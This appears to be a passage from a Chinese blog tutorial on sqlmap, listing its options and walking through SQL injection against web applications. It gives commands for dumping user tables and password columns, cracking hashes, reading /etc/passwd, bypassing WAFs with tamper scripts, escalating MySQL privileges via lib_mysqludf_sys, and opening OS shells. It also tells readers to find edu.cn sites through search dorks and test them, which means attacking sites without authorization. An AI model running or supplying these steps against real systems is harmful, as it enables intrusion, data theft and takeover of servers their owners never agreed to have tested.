        默认情况下sqlmap测试UNION查询注入会测试1-10个字段数,当--level为5的时候他会增加测试到50个字段数。设定--union-cols的值应该是一段整数,如:12-16,是测试12-16个字段数。

        设定UNION查询使用的字符

        参数:--union-char

        默认情况下sqlmap针对UNION查询的注入会使用NULL字符,但是有些情况下会造成页面返回失败,而一个随机整数是成功的,这是你可以用--union-char只定UNION查询的字符。

        二阶SQL注入

        参数:--second-order

        有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。--second-order后门跟一个判断页面的URL地址。

    16. 一般选项
      1. -s SESSIONFILE 保存和恢复检索会话文件的所有数据

        -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中

        –batch 从不询问用户输入,使用所有默认配置。

        –binary-fields=.. 结果字段具有二进制值(e.g.”digest”)

        –charset=CHARSET 强制字符编码

        –crawl=CRAWLDEPTH 从目标URL爬行网站

        –crawl-exclude=.. 正则表达式从爬行页中排除

        –csv-del=CSVDEL 限定使用CSV输出 (default”,”)

        –dump-format=DU.. 转储数据格式(CSV(default), HTML or SQLITE)

        –eta 显示每个输出的预计到达时间

        –flush-session 刷新当前目标的会话文件

        –forms 解析和测试目标URL表单

        –fresh-queries 忽略在会话文件中存储的查询结果

        –hex 使用DBMS Hex函数数据检索

        –output-dir=OUT.. 自定义输出目录路径

        –parse-errors 解析和显示响应数据库错误信息

        –save=SAVECONFIG 保存选项到INI配置文件

        –scope=SCOPE 从提供的代理日志中使用正则表达式过滤目标

        –test-filter=TE.. 选择测试的有效载荷和/或标题(e.g. ROW)

        –test-skip=TEST.. 跳过试验载荷和/或标题(e.g.BENCHMARK)

        –update 更新sqlmap

    17. 其他
      1. -z MNEMONICS 使用短记忆法 (e.g.”flu,bat,ban,tec=EU”)

        –alert=ALERT 发现SQL注入时,运行主机操作系统命令

        –answers=ANSWERS 当希望sqlmap提出输入时,自动输入自己想要的答案(e.g. “quit=N,follow=N”),例如:sqlmap -u”http://192.168.22.128/get_int.php?id=1“–technique=E–answers=”extending=N” –batch

        –beep 发现sql注入时,发出蜂鸣声。

        –cleanup 清除sqlmap注入时在DBMS中产生的udf与表。

        –dependencies Check formissing (non-core) sqlmap dependencies

        –disable-coloring 默认彩色输出,禁掉彩色输出。

        –gpage=GOOGLEPAGE 使用前100个URL地址作为注入测试,结合此选项,可以指定页面的URL测试

        –identify-waf 进行WAF/IPS/IDS保护测试,目前大约支持30种产品的识别

        –mobile 有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。

        –offline Work inoffline mode (only use session data)

        –purge-output 从输出目录安全删除所有内容,有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。

        –skip-waf 跳过WAF/IPS / IDS启发式检测保护

        –smart 进行积极的启发式测试,快速判断为注入的报错点进行注入

        –sqlmap-shell 互动提示一个sqlmapshell

        –tmp-dir=TMPDIR 用于存储临时文件的本地目录

        –web-root=WEBROOT Web服务器的文档根目录(e.g.”/var/www”)

        –wizard 新手用户简单的向导使用,可以一步一步教你如何输入针对目标注入

  5. sqlmap实际利用

    1. 检测和利用SQL注入

      1. 手工判断是否存在漏洞
        1. 对动态网页进行安全审计,通过接受动态用户提供的GET、POST、Cookie参数值、User-Agent请求头。

          原始网页:http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

          构造url1:http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1

          构造url2:http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2

          如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入。

        2. sqlmap自动检测
          1. 检测语法:sqlmap -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

          技巧:在实际检测过程中,sqlmap会不停的询问,需要手工输入Y/N来进行下一步操作,可以使用参数“–batch”命令来自动答复和判断。

        3. 寻找和判断
          1. 通过百度对“inurl:news.asp?id=site:edu.cn”、“inurl:news.php?id= site:edu.cn”、“inurl:news.aspx?id=site:edu.cn”进行搜索,搜索news.php/asp/aspx,站点为edu.cn,如图1所示。随机打开一个网页搜索结果,如图所示,如果能够正常访问,则复制该URL地址。

          超详细SQLMap使用攻略及技巧

          图2测试网页能否正常访问.jpg

          将该url使用sqlmap进行注入测试,如图3所示,测试结果可能存在SQL注入,也可能不存在SQL注入,存在则可以进行数据库名称,数据库表以及数据的操作。本例中是不存在SQL注入漏洞。

        4. 批量检测
          1. 将目标url搜集并整理为txt文件,如图4所示,所有文件都保存为tg.txt,然后使用“sqlmap-m tg.txt”,注意tg.txt跟sqlmap在同一个目录下。

          图4批量整理目标地址.jpg

    2. 直接连接数据库

      1. sqlmap -d”mysql://admin:admin@192.168.21.17:3306/testdb” -f –banner –dbs–users
    3. 数据库相关操作

      1.列数据库信息:–dbs

      2.web当前使用的数据库–current-db

      3.web数据库使用账户–current-user

      4.列出sqlserver所有用户 –users

      5.数据库账户与密码 –passwords

      6.指定库名列出所有表 -D database –tables

      -D:指定数据库名称

      7.指定库名表名列出所有字段 -D antian365-T admin –columns

      -T:指定要列出字段的表

      8.指定库名表名字段dump出指定字段

      -D secbang_com -T admin -C id,password ,username –dump

      -D antian365 -T userb -C”email,Username,userpassword” –dump

      可加双引号,也可不加双引号。

      9.导出多少条数据

      -D tourdata -T userb -C”email,Username,userpassword” –start 1 –stop 10 –dump

      参数:

      –start:指定开始的行

      –stop:指定结束的行

      此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

  6. SQLMAP实用技巧

    1. mysql的注释方法进行绕过WAF进行SQL注入

      1. 修改C:\Python27\sqlmap\tamper\halfversionedmorekeywords.py

        return match.group().replace(word,”/*!0%s” % word) 为:

        return match.group().replace(word,”/!50000%s/” % word)

      2. 修改C:\Python27\sqlmap\xml\queries.xml

        <cast query=”CAST(%s ASCHAR)”/>为:

        <castquery=”convert(%s,CHAR)”/>

      3. 使用sqlmap进行注入测试

        sqlmap -u”http://**.com/detail.php? id=16″ –tamper “halfversionedmorekeywords.py”

        其它绕过waf脚本方法:

        sqlmap-u “http://192.168.136.131/sqlmap/mysql/get_int.php?id=1” –tampertamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

      4. tamper目录下文件具体含义:

        1. space2comment.py用/**/代替空格

          apostrophemask.py用utf8代替引号

          equaltolike.pylike代替等号

          space2dash.py 绕过过滤‘=’ 替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)

          greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。

          space2hash.py空格替换为#号,随机字符串以及换行符

          apostrophenullencode.py绕过过滤双引号,替换字符和双引号。

          halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

          space2morehash.py空格替换为 #号 以及更多随机字符串 换行符

          appendnullbyte.py在有效负荷结束位置加载零字节字符编码

          ifnull2ifisnull.py 绕过对IFNULL过滤,替换类似’IFNULL(A,B)’为’IF(ISNULL(A), B, A)’

          space2mssqlblank.py(mssql)空格替换为其它空符号

          base64encode.py 用base64编码替换

          space2mssqlhash.py 替换空格

          modsecurityversioned.py过滤空格,包含完整的查询版本注释

          space2mysqlblank.py 空格替换其它空白符号(mysql)

          between.py用between替换大于号(>)

          space2mysqldash.py替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

          multiplespaces.py围绕SQL关键字添加多个空格

          space2plus.py用+替换空格

          bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like

          nonrecursivereplacement.py双重查询语句,取代SQL关键字

          space2randomblank.py代替空格字符(“”)从一个随机的空白字符可选字符的有效集

          sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

          chardoubleencode.py双url编码(不处理以编码的)

          unionalltounion.py替换UNION ALLSELECT UNION SELECT

          charencode.py url编码

          randomcase.py随机大小写

          unmagicquotes.py宽字符绕过 GPCaddslashes

          randomcomments.py用/**/分割sql关键字

          charunicodeencode.py字符串 unicode 编码

          securesphere.py追加特制的字符串

          versionedmorekeywords.py注释绕过

          space2comment.py替换空格字符串(‘‘) 使用注释‘/**/’

          halfversionedmorekeywords.py关键字前加注释

    2. URL重写SQL注入测试

      1. value1为测试参数,加“*”即可,sqlmap将会测试value1的位置是否可注入。

        sqlmap -u”http://targeturl/param1/value1*/param2/value2/”

    3. 列举并破解密码哈希值

      1. 当前用户有权限读取包含用户密码的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解。

        sqlmap -u”http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1” –passwords -v1

    4. 获取表中的数据个数

      1. sqlmap -u”http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1” –count -Dtestdb
    5. 对网站secbang.com进行漏洞爬取

      1. sqlmap -u “http://www.secbang.com“–batch –crawl=3
    6. 基于布尔SQL注入预估时间

      1. sqlmap -u “http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1“-b –eta
    7. 使用hex避免字符编码导致数据丢失

      1. sqlmap -u “http://192.168.48.130/pgsql/get_int.php?id=1” –banner –hex -v 3 –parse-errors
    8. 模拟测试手机环境站点

      1. sqlmap -u”http://www.target.com/vuln.php?id=1” –mobile
    9. 智能判断测试

      1. sqlmap -u “http://www.antian365.com/info.php?id=1“–batch –smart
    10. 结合burpsuite进行注入

      1. burpsuite抓包,需要设置burpsuite记录请求日志

        sqlmap -r burpsuite抓包.txt

      2. 指定表单注入

        sqlmap -u URL –data“username=a&password=a”

    11. sqlmap自动填写表单注入

      1. sqlmap -u URL –forms

        sqlmap -u URL –forms –dbs

        sqlmap -u URL –forms –current-db

        sqlmap -u URL –forms -D 数据库名称–tables

        sqlmap -u URL –forms -D 数据库名称 -T 表名 –columns

        sqlmap -u URL –forms -D 数据库名称 -T 表名 -Cusername,password –dump

    12. 读取linux下文件

      1. sqlmap-u “url” –file /etc/password
    13. 延时注入

      1. sqlmap -u URL –technique -T–current-user
    14. sqlmap 结合burpsuite进行post注入

      1. 结合burpsuite来使用sqlmap:

        (1)浏览器打开目标地址http://www.antian365.com

        (2)配置burp代理(127.0.0.1:8080)以拦截请求

        (3)点击登录表单的submit按钮

        (4)Burp会拦截到了我们的登录POST请求

        (5)把这个post请求复制为txt, 我这命名为post.txt 然后把它放至sqlmap目录下

        (6)运行sqlmap并使用如下命令:

        ./sqlmap -r post.txt -p tfUPass
        
    15. sqlmap cookies注入

      1. sqlmap -u “http://127.0.0.1/base.PHP“–cookies “id=1″ –dbs –level 2

        默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。可以通过burpsuite等工具获取当前的cookie值,然后进行注入:

        sqlmap -u 注入点URL --cookie"id=xx" --level 3
        sqlmap -u url --cookie "id=xx"--level 3 --tables(猜表名)
        sqlmap -u url --cookie "id=xx"--level 3 -T 表名 --coiumns
        sqlmap -u url --cookie "id=xx"--level 3 -T 表名 -C username,password --dump
        
    16. mysql提权

      1. 连接mysql数据打开一个交互shell:

        sqlmap -dmysql://root:root@127.0.0.1:3306/test --sql-shell
        select @@version;
        select @@plugin_dir;
        d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\
        
      2. 利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:

        sqlmap -dmysql://root:root@127.0.0.1:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll--file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll
        CREATE FUNCTION sys_exec RETURNS STRINGSONAME 'lib_mysqludf_sys.dll'
        CREATE FUNCTION sys_eval RETURNS STRINGSONAME 'lib_mysqludf_sys.dll'
        select sys_eval('ver'); 
        
  7. 执行shell命令

    1. sqlmap -u “url” –os-cmd=”netuser” /执行net user命令/

      sqlmap -u “url” –os-shell /系统交互的shell/

    2. 延时注入

      1. sqlmap –dbs -u"url" –delay 0.5 /延时0.5秒/

        sqlmap –dbs -u"url" –safe-freq /请求2次/

posted @ 2022-06-13 09:47  Rlins  阅读(918)  评论(0)    收藏  举报